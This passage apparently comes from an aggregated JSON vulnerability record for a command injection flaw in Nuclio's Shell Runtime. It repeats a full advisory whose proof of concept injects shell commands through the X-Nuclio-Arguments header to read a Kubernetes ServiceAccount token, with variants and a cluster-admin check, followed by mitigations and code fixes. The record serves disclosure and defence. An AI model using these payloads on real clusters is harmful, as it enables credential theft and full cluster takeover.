kind-config.yaml\n```\n\n**Step 2: Setup Local Registry**\n\n```bash\n# Start registry container\ndocker run -d -p 5000:5000 --name registry --network kind registry:2\ndocker network connect kind registry\n\n# Configure containerd on worker node\ndocker exec nuclio-test-worker bash -c 'cat >> /etc/containerd/config.toml << EOF\n\n[plugins.\"io.containerd.grpc.v1.cri\".registry.mirrors.\"registry:5000\"]\n  endpoint = [\"http://registry:5000\"]\n[plugins.\"io.containerd.grpc.v1.cri\".registry.configs.\"registry:5000\".tls]\n  insecure_skip_verify = true\nEOF'\n\ndocker exec nuclio-test-worker systemctl restart containerd\n```\n\n**Step 3: Install Nuclio**\n\n```bash\n# Add Helm repository\nhelm repo add nuclio https://nuclio.github.io/nuclio/charts\nhelm repo update\n\n# Install Nuclio 1.15.17\nhelm install nuclio nuclio/nuclio \\\n  --namespace nuclio \\\n  --create-namespace \\\n  --set registry.pushPullUrl=registry:5000\n\n# Wait for pods to be ready\nkubectl wait --for=condition=ready pod -l app.kubernetes.io/name=nuclio -n nuclio --timeout=300s\n```\n\n**Step 4: Deploy Vulnerable Function**\n\n```bash\n# Create shell script\ncat > echo.sh <<'EOF'\n#!/bin/sh\necho \"Response from shell function\"\nEOF\nchmod +x echo.sh\n\n# Create project\nkubectl apply -f - <<EOF\napiVersion: nuclio.io/v1beta1\nkind: NuclioProject\nmetadata:\n  name: default\n  namespace: nuclio\nspec:\n  displayName: Default Project\nEOF\n\n# Deploy function\nnuctl deploy shell-func \\\n  --path echo.sh \\\n  --runtime shell \\\n  --namespace nuclio \\\n  --registry localhost:5000 \\\n  --run-registry registry:5000 \\\n  --project-name default\n\n# Verify deployment\nkubectl -n nuclio get pods -l nuclio.io/function-name=shell-func\n```\n\n### Exploitation\n\n**Test 1: Verify Command Injection**\n\n```bash\nkubectl run -n nuclio exploit-test \\\n  --image=curlimages/curl:latest \\\n  --rm -i --restart=Never -- \\\n  curl -s -X POST \\\n  -H \"Content-Type: text/plain\" \\\n  -H \"x-nuclio-arguments: ; id ; whoami ;\" \\\n  -d \"test\" \\\n  http://nuclio-shell-func:8080\n```\n\n**Expected Output:**\n```\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\nroot\n```\n\n**Test 2: Extract ServiceAccount Token**\n\n```bash\nkubectl run -n nuclio token-extract \\\n  --image=curlimages/curl:latest \\\n  --rm -i --restart=Never -- \\\n  curl -s -X POST \\\n  -H \"Content-Type: text/plain\" \\\n  -H \"x-nuclio-arguments: ; cat /var/run/secrets/kubernetes.io/serviceaccount/token ;\" \\\n  -d \"test\" \\\n  http://nuclio-shell-func:8080\n```\n\n**Expected Output:**\n```\neyJhbGciOiJSUzI1NiIsImtpZCI6IldUZFN0d3dod2hSNE8yLWtRZmc0Z0N0UWNtaDMxVDhEVlQyYWRnS3AzbEkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxODAyMzk4Mzg3...\n```\n\n**Test 3: Validate Token Privileges**\n\n```bash\n# Extract token from previous output and test permissions\nTOKEN=\"<extracted-token>\"\n\nkubectl auth can-i --list --token=\"$TOKEN\"\n```\n\n**Expected Output:**\n```\nResources                                       Non-Resource URLs   Resource Names   Verbs\n*.*                                             []                  []               [*]\n                                                [*]                 []               [*]\n```\n\nThis confirms the token has cluster-admin level permissions.\n\n**Test 4: Verify Cluster Access**\n\n```bash\n# Test reading secrets\nkubectl auth can-i get secrets --all-namespaces --token=\"$TOKEN\"\n# Output: yes\n\n# Test creating pods\nkubectl auth can-i create pods --all-namespaces --token=\"$TOKEN\"\n# Output: yes\n```\n\n### Alternative Injection Methods\n\n**Backtick Injection:**\n```bash\ncurl -s -X POST \\\n  -H \"Content-Type: text/plain\" \\\n  -H 'x-nuclio-arguments: `cat /var/run/secrets/kubernetes.io/serviceaccount/token`' \\\n  -d \"test\" \\\n  http://nuclio-shell-func:8080\n```\n\n**$() Syntax Injection:**\n```bash\ncurl -s -X POST \\\n  -H \"Content-Type: text/plain\" \\\n  -H 'x-nuclio-arguments: $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)' \\\n  -d \"test\" \\\n  http://nuclio-shell-func:8080\n```\n\nBoth methods successfully extract the token.\n\n## Impact\n\n### Severity Assessment\n\nThis vulnerability enables complete cluster compromise through a multi-stage attack:\n\n**Stage 1: Command Injection**\n- Attacker injects malicious commands via HTTP header\n- Commands execute with root privileges in function container\n- No authentication or authorization checks on command content\n\n**Stage 2: Credential Theft**\n- Attacker reads ServiceAccount token from mounted secret\n- Token belongs to `system:serviceaccount:nuclio:default`\n- Token has cluster-admin level permissions\n\n**Stage 3: Privilege Escalation**\n- Attacker uses stolen token to authenticate to Kubernetes API\n- Gains full control over all cluster resources\n- Can read all secrets, create/modify/delete any resource\n\n### Affected Resources\n\n**Confidentiality Impact:** High\n- All secrets across all namespaces can be read\n- Database credentials, API keys, certificates exposed\n- Application data and configuration accessible\n\n**Integrity Impact:** High\n- Attacker can modify any cluster resource\n- Can deploy malicious workloads\n- Can alter RBAC policies and security controls\n- Can inject backdoors for persistent access\n\n**Availability Impact:** Medium\n- Attacker can delete critical resources\n- Can deploy resource-intensive workloads causing DoS\n- Can disrupt cluster operations\n\n### Real-World Attack Scenarios\n\n**Scenario 1: Data Breach**\n1. Attacker gains function invocation access (low privilege)\n2. Injects command to extract ServiceAccount token\n3. Uses token to read all secrets in production namespace\n4. Exfiltrates database credentials and API keys\n5. Accesses production databases and external services\n\n**Scenario 2: Supply Chain Compromise**\n1. Attacker compromises CI/CD pipeline\n2. Deploys malicious Nuclio function\n3. Function automatically executes on deployment\n4. Establishes persistent backdoor in cluster\n5. Pivots to compromise other applications\n\n**Scenario 3: Ransomware Attack**\n1. Attacker exploits vulnerability to gain cluster access\n2. Deploys crypto-mining or ransomware pods\n3. Encrypts persistent volumes\n4. Demands ransom for decryption keys\n\n## Severity\n\n**CVSS v3.1 Vector:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L\n\n**CVSS Score:** 9.1 (Critical)\n\n**Justification:**\n- **Attack Vector (Network):** Exploitable remotely via HTTP\n- **Attack Complexity (Low):** No special conditions required\n- **Privileges Required (Low):** Only function invocation permission needed\n- **User Interaction (None):** Fully automated exploitation\n- **Scope (Changed):** Breaks out of function container to cluster level\n- **Confidentiality (High):** Complete access to all secrets\n- **Integrity (High):** Full control over cluster resources\n- **Availability (Low):** Limited direct availability impact\n\n## Affected Versions\n\n- Nuclio: All versions up to and including 1.15.19\n- Component: Shell Runtime (`pkg/processor/runtime/shell`)\n\nThe vulnerability exists in all versions that include the Shell Runtime component, as the vulnerable code pattern has been present since the feature's introduction.\n\n## Patched Versions\n\nNo patch is currently available. Users should implement workarounds until an official fix is released.\n\n## Workarounds\n\n### Immediate Mitigation (Choose One)\n\n**Option 1: Disable Shell Runtime**\n\nAdd to Nuclio platform configuration:\n\n```yaml\nplatformConfig:\n  runtimes:\n    shell:\n      enabled: false\n```\n\nThis completely disables the vulnerable component but breaks existing Shell Runtime functions.\n\n**Option 2: Restrict Function Deployment**\n\nLimit who can deploy functions using RBAC:\n\n```yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  name: nuclio-function-deployer\n  namespace: nuclio\nrules:\n- apiGroups: [\"nuclio.io\"]\n  resources: [\"nucliofunctions\"]\n  verbs: [\"create\", \"update\", \"patch\"]\n  # Only grant to trusted users\n```\n\nRemove default function deployment permissions from untrusted users.\n\n**Option 3: Network Isolation**\n\nRestrict egress traffic from function pods:\n\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n  name: nuclio-processor-egress\n  namespace: nuclio\nspec:\n  podSelector:\n    matchLabels:\n      nuclio.io/component: processor\n  policyTypes:\n  - Egress\n  egress:\n  - to:\n    - podSelector: {}\n    ports:\n    - protocol: TCP\n      port: 443  # Only allow HTTPS to cluster API\n```\n\nThis limits the attacker's ability to exfiltrate data but doesn't prevent the initial exploitation.\n\n### Long-Term Fixes\n\n**Fix 1: Input Validation**\n\nImplement strict validation in `getCommandArguments`:\n\n```go\nimport \"regexp\"\n\nvar argumentsRegex = regexp.MustCompile(`^[a-zA-Z0-9_\\-=., ]+$`)\n\nfunc (s *shell) getCommandArguments(event nuclio.Event) []string {\n    arguments := event.GetHeaderString(headers.Arguments)\n\n    if arguments == \"\" {\n        arguments = s.configuration.Arguments\n    }\n\n    if !argumentsRegex.MatchString(arguments) {\n        s.Logger.ErrorWith(\"Invalid arguments: contains unsafe characters\")\n        return []string{}\n    }\n\n    return strings.Split(arguments, \" \")\n}\n```\n\n**Fix 2: Remove sh -c Execution**\n\nUse parameterized command execution:\n\n```go\nfunc (s *shell) processEvent(context context.Context,\n    command []string,\n    event nuclio.Event,\n    responseChan chan nuclio.Response) {\n\n    var cmd *exec.Cmd\n\n    if len(command) > 0 {\n        cmd = exec.CommandContext(context, command[0], command[1:]...)\n    } else {\n        // Handle error\n        return\n    }\n\n    cmd.Stdin = strings.NewReader(string(event.GetBody()))\n    // ... rest of code\n}\n```\n\n**Fix 3: Limit ServiceAccount Permissions**\n\nCreate restricted ServiceAccount for function pods:\n\n```yaml\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n  name: nuclio-function-sa\n  namespace: nuclio\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  name: nuclio-function-role\n  namespace: nuclio\nrules:\n- apiGroups: [\"\"]\n  resources: [\"configmaps\"]\n  verbs: [\"get\", \"list\"]\n# Do not grant secrets or cross-namespace access\n```\n\n## Resources\n\n- Nuclio GitHub: https://github.com/nuclio/nuclio\n- CWE-78: OS Command Injection: https://cwe.mitre.org/data/definitions/78.html\n- OWASP Command Injection: https://owasp.org/www-community/attacks/Command_Injection\n- Kubernetes Security Best Practices: https://kubernetes.io/docs/concepts/security/\n\n## Credits\ncredit for:\n@b0b0haha (603571786@qq.com)\n@j311yl0v3u (2439839508@qq.com)",
                    "title": "github - https://github.com/advisories/GHSA-95fj-3w7g-4r27"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThis vulnerability exists in Nuclio's Shell Runtime component, allowing attackers with function invocation permissions to inject malicious commands via HTTP request headers, execute arbitrary code with root privileges in function containers, steal ServiceAccount Tokens with cluster-admin level permissions, and ultimately achieve complete control over the entire Kubernetes cluster. Recommended CWE classification: CWE-78 (OS Command Injection).\n\nNuclio Shell Runtime processes the `X-Nuclio-Arguments` HTTP header without validation or escaping, directly concatenating user input into shell commands executed via `sh -c`. This allows arbitrary command injection, enabling attackers to read sensitive files (including ServiceAccount tokens) and access the Kubernetes API with cluster-level privileges.\n\n## Details\n\n### Vulnerability Description\n\nThe Nuclio Shell Runtime component contains a critical command injection vulnerability in how it processes user-supplied arguments. When a function is invoked via HTTP, the runtime reads the `X-Nuclio-Arguments` header and directly incorporates its value into shell commands without any validation or sanitization.\n\n### Root Cause Analysis\n\n**Vulnerable Code Location 1:** `pkg/processor/runtime/shell/runtime.go:289-297`\n\n```go\nfunc (s *shell) getCommandArguments(event nuclio.Event) []string {\n    arguments := event.GetHeaderString(headers.Arguments)\n\n    if arguments == \"\" {\n        arguments = s.configuration.Arguments\n    }\n\n    return strings.Split(arguments, \" \")  // No validation performed\n}\n```\n\nThe function retrieves the `X-Nuclio-Arguments` header value and splits it by spaces without any validation. Shell metacharacters like `;`, `|`, `&&`, backticks, and `$()` are not filtered or escaped.\n\n**Vulnerable Code Location 2:** `pkg/processor/runtime/shell/runtime.go:204-213`\n\n```go\nif s.commandInPath {\n    // if the command is an executable, run it as a command with sh -c.\n    cmd = exec.CommandContext(context, \"sh\", \"-c\", strings.Join(command, \" \"))\n} else {\n    // if the command is a shell script run it with sh(without -c).\n    cmd = exec.CommandContext(context, \"sh\", command...)\n}\n\ncmd.Stdin = strings.NewReader(string(event.GetBody()))\n```\n\nThe runtime joins the command array (which includes user-controlled arguments) into a single string and executes it using `sh -c`. This execution mode interprets shell metacharacters, enabling command injection.\n\n### Attack Flow\n\n1. Attacker sends HTTP request to Nuclio function with malicious `X-Nuclio-Arguments` header\n2. Runtime extracts header value without validation\n3. Malicious payload is concatenated into shell command\n4. Command is executed via `sh -c` with root privileges\n5. Attacker executes arbitrary commands (e.g., reading ServiceAccount token)\n6. Attacker uses stolen token to access Kubernetes API with cluster-admin privileges\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites:**\n- Docker installed\n- kubectl installed\n- Helm 3.x installed\n- 8GB RAM minimum\n\n**Step 1: Create Kubernetes Cluster**\n\n```bash\n# Install Kind\ncurl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.20.0/kind-linux-amd64\nchmod +x ./kind\nsudo mv ./kind /usr/local/bin/kind\n\n# Create cluster with registry configuration\ncat > kind-config.yaml <<EOF\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nnodes:\n- role: control-plane\n- role: worker\nEOF\n\nkind create cluster --name nuclio-test --config kind-config.yaml\n```\n\n**Step 2: Setup Local Registry**\n\n```bash\n# Start registry container\ndocker run -d -p 5000:5000 --name registry --network kind registry:2\ndocker network connect kind registry\n\n# Configure containerd on worker node\ndocker exec nuclio-test-worker bash -c 'cat >> /etc/containerd/config.toml << EOF\n\n[plugins.\"io.containerd.grpc.v1.cri\".registry.mirrors.\"registry:5000\"]\n  endpoint = [\"http://registry:5000\"]\n[plugins.\"io.containerd.grpc.v1.cri\".registry.configs.\"registry:5000\".tls]\n  insecure_skip_verify = true\nEOF'\n\ndocker exec nuclio-test-worker systemctl restart containerd\n```\n\n**Step 3: Install Nuclio**\n\n```bash\n# Add Helm repository\nhelm repo add nuclio https://nuclio.github.io/nuclio/charts\nhelm repo update\n\n# Install Nuclio 1.15.17\nhelm install nuclio nuclio/nuclio \\\n  --namespace nuclio \\\n  --create-namespace \\\n  --set registry.pushPullUrl=registry:5000\n\n# Wait for pods to be ready\nkubectl wait --for=condition=ready pod -l app.kubernetes.io/name=nuclio -n nuclio --timeout=300s\n```\n\n**Step 4: Deploy Vulnerable Function**\n\n```bash\n# Create shell script\ncat > echo.sh <<'EOF'\n#!/bin/sh\necho \"Response from shell function\"\nEOF\nchmod +x echo.sh\n\n# Create project\nkubectl apply -f - <<EOF\napiVersion: nuclio.io/v1beta1\nkind: NuclioProject\nmetadata:\n  name: default\n  namespace: nuclio\nspec:\n  displayName: Default Project\nEOF\n\n# Deploy function\nnuctl deploy shell-func \\\n  --path echo.sh \\\n  --runtime shell \\\n  --namespace nuclio \\\n  --registry localhost:5000 \\\n  --run-registry registry:5000 \\\n  --project-name default\n\n# Verify deployment\nkubectl -n nuclio get pods -l nuclio.io/function-name=shell-func\n```\n\n### Exploitation\n\n**Test 1: Verify Command Injection**\n\n```bash\nkubectl run -n nuclio exploit-test \\\n  --image=curlimages/curl:latest \\\n  --rm -i --restart=Never -- \\\n  curl -s -X POST \\\n  -H \"Content-Type: text/plain\" \\\n  -H \"x-nuclio-arguments: ; id ; whoami ;\" \\\n  -d \"test\" \\\n  http://nuclio-shell-func:8080\n```\n\n**Expected Output:**\n```\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\nroot\n```\n\n**Test 2: Extract ServiceAccount Token**\n\n```bash\nkubectl run -n nuclio token-extract \\\n  --image=curlimages/curl:latest \\\n  --rm -i --restart=Never -- \\\n  curl -s -X POST \\\n  -H \"Content-Type: text/plain\" \\\n  -H \"x-nuclio-arguments: ; cat /var/run/secrets/kubernetes.io/serviceaccount/token ;\" \\\n  -d \"test\" \\\n  http://nuclio-shell-func:8080\n```\n\n**Expected Output:**\n```\neyJhbGciOiJSUzI1NiIsImtpZCI6IldUZFN0d3dod2hSNE8yLWtRZmc0Z0N0UWNtaDMxVDhEVlQyYWRnS3AzbEkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxODAyMzk4Mzg3...\n```\n\n**Test 3: Validate Token Privileges**\n\n```bash\n# Extract token from previous output and test permissions\nTOKEN=\"<extracted-token>\"\n\nkubectl auth can-i --list --token=\"$TOKEN\"\n```\n\n**Expected Output:**\n```\nResources                                       Non-Resource URLs   Resource Names   Verbs\n*.*                                             []                  []               [*]\n                                                [*]                 []               [*]\n```\n\nThis confirms the token has cluster-admin level permissions.\n\n**Test 4: Verify Cluster Access**\n\n```bash\n# Test reading secrets\nkubectl auth can-i get secrets --all-namespaces --token=\"$TOKEN\"\n# Output: yes\n\n# Test creating pods\nkubectl auth can-i create pods --all-namespaces --token=\"$TOKEN\"\n# Output: yes\n```\n\n### Alternative Injection Methods\n\n**Backtick Injection:**\n```bash\ncurl -s -X POST \\\n  -H \"Content-Type: text/plain\" \\\n  -H 'x-nuclio-arguments: `cat /var/run/secrets/kubernetes.io/serviceaccount/token`' \\\n  -d \"test\" \\\n  http://nuclio-shell-func:8080\n```\n\n**$() Syntax Injection:**\n```bash\ncurl -s -X POST \\\n  -H \"Content-Type: text/plain\" \\\n  -H 'x-nuclio-arguments: $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)' \\\n  -d \"test\" \\\n  http://nuclio-shell-func:8080\n```\n\nBoth methods successfully extract the token.\n\n## Impact\n\n### Severity Assessment\n\nThis vulnerability enables complete cluster compromise through a multi-stage attack:\n\n**Stage 1: Command Injection**\n- Attacker injects malicious commands via HTTP header\n- Commands execute with root privileges in function container\n- No authentication or authorization checks on command content\n\n**Stage 2: Credential Theft**\n- Attacker reads ServiceAccount token from mounted secret\n- Token belongs to `system:serviceaccount:nuclio:default`\n- Token has cluster-admin level permissions\n\n**Stage 3: Privilege Escalation**\n- Attacker uses stolen token to authenticate to Kubernetes API\n- Gains full control over all cluster resources\n- Can read all secrets, create/modify/delete any resource\n\n### Affected Resources\n\n**Confidentiality Impact:** High\n- All secrets across all namespaces can be read\n- Database credentials, API keys, certificates exposed\n- Application data and configuration accessible\n\n**Integrity Impact:** High\n- Attacker can modify any cluster resource\n- Can deploy malicious workloads\n- Can alter RBAC policies and security controls\n- Can inject backdoors for persistent access\n\n**Availability Impact:** Medium\n- Attacker can delete critical resources\n- Can deploy resource-intensive workloads causing DoS\n- Can disrupt cluster operations\n\n### Real-World Attack Scenarios\n\n**Scenario 1: Data Breach**\n1. Attacker gains function invocation access (low privilege)\n2. Injects command to extract ServiceAccount token\n3. Uses token to read all secrets in production namespace\n4. Exfiltrates database credentials and API keys\n5. Accesses production databases and external services\n\n**Scenario 2: Supply Chain Compromise**\n1. Attacker compromises CI/CD pipeline\n2. Deploys malicious Nuclio function\n3. Function automatically executes on deployment\n4. Establishes persistent backdoor in cluster\n5. Pivots to compromise other applications\n\n**Scenario 3: Ransomware Attack**\n1. Attacker exploits vulnerability to gain cluster access\n2. Deploys crypto-mining or ransomware pods\n3. Encrypts persistent volumes\n4. Demands ransom for decryption keys\n\n## Severity\n\n**CVSS v3.1 Vector:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L\n\n**CVSS Score:** 9.1 (Critical)\n\n**Justification:**\n- **Attack Vector (Network):** Exploitable remotely via HTTP\n- **Attack Complexity (Low):** No special conditions required\n- **Privileges Required (Low):** Only function invocation permission needed\n- **User Interaction (None):** Fully automated exploitation\n- **Scope (Changed):** Breaks out of function container to cluster level\n- **Confidentiality (High):** Complete access to all secrets\n- **Integrity (High):** Full control over cluster resources\n- **Availability (Low):** Limited direct availability impact\n\n## Affected Versions\n\n- Nuclio: All versions up to and including 1.15.19\n- Component: Shell Runtime (`pkg/processor/runtime/shell`)\n\nThe vulnerability exists in all versions that include the Shell Runtime component, as the vulnerable code pattern has been present since the feature's introduction.\n\n## Patched Versions\n\nNo patch is currently available. Users should implement workarounds until an official fix is released.\n\n## Workarounds\n\n### Immediate Mitigation (Choose One)\n\n**Option 1: Disable Shell Runtime**\n\nAdd to Nuclio platform configuration:\n\n```yaml\nplatformConfig:\n  runtimes:\n    shell:\n      enabled: false\n```\n\nThis completely disables the vulnerable component but breaks existing Shell Runtime functions.\n\n**Option 2: Restrict Function Deployment**\n\nLimit who can deploy functions using RBAC:\n\n```yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  name: nuclio-function-deployer\n  namespace: nuclio\nrules:\n- apiGroups: [\"nuclio.io\"]\n  resources: [\"nucliofunctions\"]\n  verbs: [\"create\", \"update\", \"patch\"]\n  # Only grant to trusted users\n```\n\nRemove default function deployment permissions from untrusted users.\n\n**Option 3: Network Isolation**\n\nRestrict egress traffic from function pods:\n\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n  name: nuclio-processor-egress\n  namespace: nuclio\nspec:\n  podSelector:\n    matchLabels:\n      nuclio.io/component: processor\n  policyTypes:\n  - Egress\n  egress:\n  - to:\n    - podSelector: {}\n    ports:\n    - protocol: TCP\n      port: 443  # Only allow HTTPS to cluster API\n```\n\nThis limits the attacker's ability to exfiltrate data but doesn't prevent the initial exploitation.\n\n### Long-Term Fixes\n\n**Fix 1: Input Validation**\n\nImplement strict validation in `getCommandArguments`:\n\n```go\nimport \"regexp\"\n\nvar argumentsRegex = regexp.MustCompile(`^[a-zA-Z0-9_\\-=., ]+$`)\n\nfunc (s *shell) getCommandArguments(event nuclio.Event) []string {\n    arguments := event.GetHeaderString(headers.Arguments)\n\n    if arguments == \"\" {\n        arguments = s.configuration.Arguments\n    }\n\n    if !argumentsRegex.MatchString(arguments) {\n        s.Logger.ErrorWith(\"Invalid arguments: contains unsafe characters\")\n        return []string{}\n    }\n\n    return strings.Split(arguments, \" \")\n}\n```\n\n**Fix 2: Remove sh -c Execution**\n\nUse parameterized command execution:\n\n```go\nfunc (s *shell) processEvent(context context.Context,\n    command []string,\n    event nuclio.Event,\n    responseChan chan nuclio.Response) {\n\n    var cmd *exec.Cmd\n\n    if len(command) > 0 {\n        cmd = exec.CommandContext(context, command[0], command[1:]...)\n    } else {\n        // Handle error\n        return\n    }\n\n    cmd.Stdin = strings.NewReader(string(event.GetBody()))\n    // ... rest of code\n}\n```\n\n**Fix 3: Limit ServiceAccount Permissions**\n\nCreate restricted ServiceAccount for function pods:\n\n```yaml\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n  name: nuclio-function-sa\n  namespace: nuclio\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  name: nuclio-function-role\n  namespace: nuclio\nrules:\n- apiGroups: [\"\"]\n  resources: [\"configmaps\"]\n  verbs: [\"get\", \"list\"]\n# Do not grant secrets or cross-namespace access\n```\n\n## Resources\n\n- Nuclio GitHub: https://github.com/nuclio/nuclio\n- CWE-78: OS Command Injection: https://cwe.mitre.org/data/definitions/78.html\n- OWASP Command Injection: https://owasp.org/www-community/attacks/Command_Injection\n- Kubernetes Security Best Practices: https://kubernetes.io/docs/concepts/security/\n\n## Credits\ncredit for:\n@b0b0haha (603571786@qq.com)\n@j311yl0v3u (2439839508@qq.com)",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-95fj-3w7g-4r27.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Nuclio is a \"Serverless\" framework for Real-Time Events and Data Processing. Prior to version 1.15.20, the Nuclio Shell Runtime component contains a command injection vulnerability in how it processes user-supplied arguments. When a function is invoked via HTTP, the runtime reads the X-Nuclio-Arguments header and directly incorporates its value into shell commands without any validation or sanitization. This issue has been patched in version 1.15.20.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-29042"
                },
                {
                    "category": "description",
                    "text": "Nuclio is a \"Serverless\" framework for Real-Time Events and Data Processing. Prior to version 1.15.20, the Nuclio Shell Runtime component contains a command injection vulnerability in how it processes user-supplied arguments. When a function is invoked via HTTP, the runtime reads the X-Nuclio-Arguments header and directly incorporates its value into shell commands without any validation or sanitization. This issue has been patched in version 1.15.20.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-29042"
                },
                {
                    "category": "description",
                    "text": "Nuclio Shell Runtime Command Injection Leading to Privilege Escalation in github.com/nuclio/nuclio.\n\nNOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions.\n\n(If this is causing false-positive reports from vulnerability scanners, please suggest an edit to the report.)\n\nThe additional affected modules and versions are: github.com/nuclio/nuclio before v1.15.20.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4598.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Nuclio is a \"Serverless\" framework for Real-Time Events and Data Processing. Prior to version 1.15.20, the Nuclio Shell Runtime component contains a command injection vulnerability in how it processes user-supplied arguments. When a function is invoked via HTTP, the runtime reads the X-Nuclio-Arguments header and directly incorporates its value into shell commands without any validation or sanitization. This issue has been patched in version 1.15.20.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-29042.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00691",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "8.9",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "4.8",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is product data available from a private source, There is cvss data available from a private source",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "There is exploit data available from source Nvd, The value of the most recent CVSS (V3) score, Exploit code publicly available",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5759448",
                    "CSAFPID-5765482",
                    "CSAFPID-5778684",
                    "CSAFPID-5908758",
                    "CSAFPID-5908759",
                    "CSAFPID-5908760",
                    "CSAFPID-5908761",
                    "CSAFPID-5908762",
                    "CSAFPID-5908763",
                    "CSAFPID-5908764",
                    "CSAFPID-5908765",
                    "CSAFPID-5908766",
                    "CSAFPID-5908767",
                    "CSAFPID-5908768",
                    "CSAFPID-5908769",
                    "CSAFPID-5908770",
                    "CSAFPID-5908771",
                    "CSAFPID-5908772",
                    "CSAFPID-5908773",
                    "CSAFPID-5908774",
                    "CSAFPID-5908775",
                    "CSAFPID-5908776",
                    "CSAFPID-5908777",
                    "CSAFPID-5908778",
                    "CSAFPID-5908779",
                    "CSAFPID-5908780",
                    "CSAFPID-5908781",
                    "CSAFPID-5908782",
                    "CSAFPID-5908783",
                    "CSAFPID-5908784",
                    "CSAFPID-5908785",
                    "CSAFPID-5908786",
                    "CSAFPID-5908787",
                    "CSAFPID-5908788",
                    "CSAFPID-5908789",
                    "CSAFPID-5908790",
                    "CSAFPID-5908791",
                    "CSAFPID-5908792",
                    "CSAFPID-5908793",
                    "CSAFPID-5908794",
                    "CSAFPID-5908795",
                    "CSAFPID-5908796",
                    "CSAFPID-5908797",
                    "CSAFPID-5908798",
                    "CSAFPID-5908799",
                    "CSAFPID-5908800",
                    "CSAFPID-5908801",
                    "CSAFPID-5908802",
                    "CSAFPID-5908803",
                    "CSAFPID-5908804",
                    "CSAFPID-5908805",
                    "CSAFPID-5908806",
                    "CSAFPID-5908807",
                    "CSAFPID-5908808",
                    "CSAFPID-5908809",
                    "CSAFPID-5908810",
                    "CSAFPID-5908811",
                    "CSAFPID-5908812",
                    "CSAFPID-5908813",
                    "CSAFPID-5908814",
                    "CSAFPID-5908815",
                    "CSAFPID-5908816",
                    "CSAFPID-5908817",
                    "CSAFPID-5908818",
                    "CSAFPID-5908819",
                    "CSAFPID-5908820",
                    "CSAFPID-5908821",
                    "CSAFPID-5908822",
                    "CSAFPID-5908823",
                    "CSAFPID-5908824",
                    "CSAFPID-5908825",
                    "CSAFPID-5908826",
                    "CSAFPID-5908827",
                    "CSAFPID-5908828",
                    "CSAFPID-5908829",
                    "CSAFPID-5908830",
                    "CSAFPID-5908831",
                    "CSAFPID-5908832",
                    "CSAFPID-5908833",
                    "CSAFPID-5908834",
                    "CSAFPID-5908835",
                    "CSAFPID-5908836",
                    "CSAFPID-5908837",
                    "CSAFPID-5908838",
                    "CSAFPID-5908839",
                    "CSAFPID-5908840",
                    "CSAFPID-5908841",
                    "CSAFPID-5908842",
                    "CSAFPID-5908843",
                    "CSAFPID-5908844",
                    "CSAFPID-5908845",
                    "CSAFPID-5908846",
                    "CSAFPID-5908847",
                    "CSAFPID-5908848",
                    "CSAFPID-5908849",
                    "CSAFPID-5908850",
                    "CSAFPID-5908851",
                    "CSAFPID-5908852",
                    "CSAFPID-5908853",
                    "CSAFPID-5908854",
                    "CSAFPID-5908855",
                    "CSAFPID-5908856",
                    "CSAFPID-5908857",
                    "CSAFPID-5908858",
                    "CSAFPID-5908859",
                    "CSAFPID-5908860",
                    "CSAFPID-5908861",
                    "CSAFPID-5908862",
                    "CSAFPID-5908863",
                    "CSAFPID-5908864",
                    "CSAFPID-5908865",
                    "CSAFPID-5908866",
                    "CSAFPID-5908867",
                    "CSAFPID-5908868",
                    "CSAFPID-5908869",
                    "CSAFPID-5908870",
                    "CSAFPID-5908871",
                    "CSAFPID-5908872",
                    "CSAFPID-5908873",
                    "CSAFPID-5908874",
                    "CSAFPID-5908875",
                    "CSAFPID-5908876",
                    "CSAFPID-5908877",
                    "CSAFPID-5908878",
